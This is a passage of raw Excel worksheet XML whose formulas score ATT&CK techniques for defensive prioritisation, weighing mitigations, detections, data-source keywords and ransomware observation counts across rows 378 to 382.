      <c r="A378" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1904761904761905E-2</v>
      </c>
      <c r="B378" s="25">
        <f>SUM(H378,M378,V378)*(1+SUM(AE378,AG378,AI378,AK378,AM378))</f>
        <v>0.18571428571428572</v>
      </c>
      <c r="C378" s="25" t="s">
        <v>1485</v>
      </c>
      <c r="D378" s="25" t="s">
        <v>339</v>
      </c>
      <c r="E378" s="25" t="s">
        <v>1486</v>
      </c>
      <c r="F378" s="51">
        <v>1</v>
      </c>
      <c r="G378" s="51">
        <v>1</v>
      </c>
      <c r="H378" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I378">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J378">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K378">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L378">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M378" s="25">
        <v>0</v>
      </c>
      <c r="N378" s="51">
        <v>0</v>
      </c>
      <c r="O378" s="51">
        <v>0</v>
      </c>
      <c r="P378" s="51">
        <v>0</v>
      </c>
      <c r="Q378" s="51">
        <v>0</v>
      </c>
      <c r="R378" s="51" t="s">
        <v>340</v>
      </c>
      <c r="S378" s="51">
        <v>2</v>
      </c>
      <c r="T378" s="51" t="s">
        <v>303</v>
      </c>
      <c r="U378" s="51">
        <v>7</v>
      </c>
      <c r="V378" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W378">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X378">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y378">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z378">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA378">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB378">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC378" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD378" s="25" t="str" cm="1">
        <f t="array" ref="AD378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC378)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE378" s="25">
        <f>IF(AD378="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF378" s="25" t="str" cm="1">
        <f t="array" ref="AF378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC378)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG378" s="25">
        <f>IF(AF378="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH378" s="25" t="str" cm="1">
        <f t="array" ref="AH378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC378)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI378" s="25">
        <f>IF(AH378="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ378" s="25" t="str" cm="1">
        <f t="array" ref="AJ378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC378)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK378" s="25">
        <f>IF(AJ378="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL378" s="25" t="str" cm="1">
        <f t="array" ref="AL378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC378)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM378" s="25">
        <f>IF(AL378="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN378" s="62" t="s">
        <v>1487</v>
      </c>
      <c r="AO378" s="51">
        <v>1</v>
      </c>
      <c r="AP378" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1904761904761905E-2</v>
      </c>
      <c r="AQ378" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.1904761904761907E-2</v>
      </c>
      <c r="AR378" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.1904761904761907E-2</v>
      </c>
      <c r="AS378" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT378" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU37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79" spans="1:47">
      <c r="A379" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1022857142857145E-2</v>
      </c>
      <c r="B379" s="25">
        <f>SUM(H379,M379,V379)*(1+SUM(AE379,AG379,AI379,AK379,AM379))</f>
        <v>0.21022857142857146</v>
      </c>
      <c r="C379" s="25" t="s">
        <v>1488</v>
      </c>
      <c r="D379" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E379" s="25" t="s">
        <v>1489</v>
      </c>
      <c r="F379" s="51">
        <v>1</v>
      </c>
      <c r="G379" s="51">
        <v>1</v>
      </c>
      <c r="H379" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I379">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J379">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K379">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L379">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M379" s="25">
        <v>0</v>
      </c>
      <c r="N379" s="51">
        <v>0</v>
      </c>
      <c r="O379" s="51">
        <v>0</v>
      </c>
      <c r="P379" s="51">
        <v>0</v>
      </c>
      <c r="Q379" s="51">
        <v>0</v>
      </c>
      <c r="R379" s="52" t="s">
        <v>1275</v>
      </c>
      <c r="S379" s="51">
        <v>3</v>
      </c>
      <c r="T379" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U379" s="51">
        <v>6</v>
      </c>
      <c r="V379" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W379">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X379">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y379">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z379">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA379">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB379">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC379" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD379" s="25" t="str" cm="1">
        <f t="array" ref="AD379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC379)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE379" s="25">
        <f>IF(AD379="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF379" s="25" t="str" cm="1">
        <f t="array" ref="AF379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC379)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG379" s="25">
        <f>IF(AF379="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH379" s="25" t="str" cm="1">
        <f t="array" ref="AH379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC379)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI379" s="25">
        <f>IF(AH379="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ379" s="25" t="str" cm="1">
        <f t="array" ref="AJ379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC379)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK379" s="25">
        <f>IF(AJ379="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL379" s="25" t="str" cm="1">
        <f t="array" ref="AL379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC379)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM379" s="25">
        <f>IF(AL379="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN379" s="59">
        <v>0</v>
      </c>
      <c r="AO379" s="51">
        <v>0</v>
      </c>
      <c r="AP379" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1022857142857145E-2</v>
      </c>
      <c r="AQ379" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.0076190476190486E-2</v>
      </c>
      <c r="AR379" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.0076190476190486E-2</v>
      </c>
      <c r="AS379" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT379" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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80" spans="1:47" ht="32.1">
      <c r="A380" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.4700000000000003E-2</v>
      </c>
      <c r="B380" s="25">
        <f>SUM(H380,M380,V380)*(1+SUM(AE380,AG380,AI380,AK380,AM380))</f>
        <v>0.24700000000000003</v>
      </c>
      <c r="C380" s="25" t="s">
        <v>1490</v>
      </c>
      <c r="D380" s="25" t="s">
        <v>302</v>
      </c>
      <c r="E380" s="25" t="s">
        <v>1491</v>
      </c>
      <c r="F380" s="51">
        <v>1</v>
      </c>
      <c r="G380" s="51">
        <v>1</v>
      </c>
      <c r="H380" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I380">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J380">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K380">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L380">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M380" s="25">
        <v>0</v>
      </c>
      <c r="N380" s="51">
        <v>0</v>
      </c>
      <c r="O380" s="51">
        <v>0</v>
      </c>
      <c r="P380" s="51">
        <v>0</v>
      </c>
      <c r="Q380" s="51">
        <v>0</v>
      </c>
      <c r="R380" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S380" s="51">
        <v>2</v>
      </c>
      <c r="T380" s="51" t="s">
        <v>303</v>
      </c>
      <c r="U380" s="51">
        <v>7</v>
      </c>
      <c r="V380" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W380">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X380">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y380">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z380">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA380">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB380">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC380" s="29" t="s">
        <v>416</v>
      </c>
      <c r="AD380" s="25" t="str" cm="1">
        <f t="array" ref="AD380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC380)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE380" s="25">
        <f>IF(AD380="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF380" s="25" t="str" cm="1">
        <f t="array" ref="AF380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC380)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG380" s="25">
        <f>IF(AF380="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH380" s="25" t="str" cm="1">
        <f t="array" ref="AH380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC380)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI380" s="25">
        <f>IF(AH380="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ380" s="25" t="str" cm="1">
        <f t="array" ref="AJ380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC380)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK380" s="25">
        <f>IF(AJ380="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL380" s="25" t="str" cm="1">
        <f t="array" ref="AL380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC380)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM380" s="25">
        <f>IF(AL380="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN380" s="52">
        <v>0</v>
      </c>
      <c r="AO380" s="51">
        <v>0</v>
      </c>
      <c r="AP380" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.4700000000000003E-2</v>
      </c>
      <c r="AQ380" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.2333333333333342E-2</v>
      </c>
      <c r="AR380" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.2333333333333342E-2</v>
      </c>
      <c r="AS380" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT380" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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81" spans="1:47">
      <c r="A381" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.8571428571428572E-2</v>
      </c>
      <c r="B381" s="25">
        <f>SUM(H381,M381,V381)*(1+SUM(AE381,AG381,AI381,AK381,AM381))</f>
        <v>0.18571428571428572</v>
      </c>
      <c r="C381" s="25" t="s">
        <v>1492</v>
      </c>
      <c r="D381" s="25" t="s">
        <v>339</v>
      </c>
      <c r="E381" s="25" t="s">
        <v>1493</v>
      </c>
      <c r="F381" s="51">
        <v>1</v>
      </c>
      <c r="G381" s="51">
        <v>1</v>
      </c>
      <c r="H381" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I381">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J381">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K381">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L381">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M381" s="25">
        <v>0</v>
      </c>
      <c r="N381" s="51">
        <v>0</v>
      </c>
      <c r="O381" s="51">
        <v>0</v>
      </c>
      <c r="P381" s="51">
        <v>0</v>
      </c>
      <c r="Q381" s="51">
        <v>0</v>
      </c>
      <c r="R381" s="51" t="s">
        <v>340</v>
      </c>
      <c r="S381" s="51">
        <v>2</v>
      </c>
      <c r="T381" s="51" t="s">
        <v>303</v>
      </c>
      <c r="U381" s="51">
        <v>7</v>
      </c>
      <c r="V381" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W381">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X381">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y381">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z381">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA381">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB381">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC381" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD381" s="25" t="str" cm="1">
        <f t="array" ref="AD381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC381)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE381" s="25">
        <f>IF(AD381="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF381" s="25" t="str" cm="1">
        <f t="array" ref="AF381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC381)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG381" s="25">
        <f>IF(AF381="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH381" s="25" t="str" cm="1">
        <f t="array" ref="AH381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC381)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI381" s="25">
        <f>IF(AH381="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ381" s="25" t="str" cm="1">
        <f t="array" ref="AJ381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC381)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK381" s="25">
        <f>IF(AJ381="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL381" s="25" t="str" cm="1">
        <f t="array" ref="AL381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC381)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM381" s="25">
        <f>IF(AL381="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN381" s="61">
        <v>0</v>
      </c>
      <c r="AO381" s="51">
        <v>0</v>
      </c>
      <c r="AP381" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.8571428571428572E-2</v>
      </c>
      <c r="AQ381" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.1904761904761907E-2</v>
      </c>
      <c r="AR381" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.1904761904761907E-2</v>
      </c>
      <c r="AS381" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT381" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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82" spans="1:47" ht="32.1">
      <c r="A382" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2248571428571427E-2</v>
      </c>
      <c r="B382" s="25">
        <f>SUM(H382,M382,V382)*(1+SUM(AE382,AG382,AI382,AK382,AM382))</f>
        <v>0.22248571428571429</v>
      </c>
      <c r="C382" s="25" t="s">
        <v>1494</v>
      </c>
      <c r="D382" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E382" s="25" t="s">
        <v>1495</v>
      </c>
      <c r="F382" s="51">
        <v>1</v>
      </c>
      <c r="G382" s="51">
        <v>1</v>
      </c>
      <c r="H382" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I382">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J382">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K382">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L382">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M382" s="25">
        <v>0</v>
      </c>
      <c r="N382" s="51">
        <v>0</v>
      </c>
      <c r="O382" s="51">
        <v>0</v>
      </c>
      <c r="P382" s="51">
        <v>0</v>
      </c>
      <c r="Q382" s="51">
        <v>0</v>
      </c>
      <c r="R382" s="52" t="s">
        <v>1275</v>
      </c>
      <c r="S382" s="51">
        <v>3</v>
      </c>
      <c r="T382" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U382" s="51">
        <v>6</v>
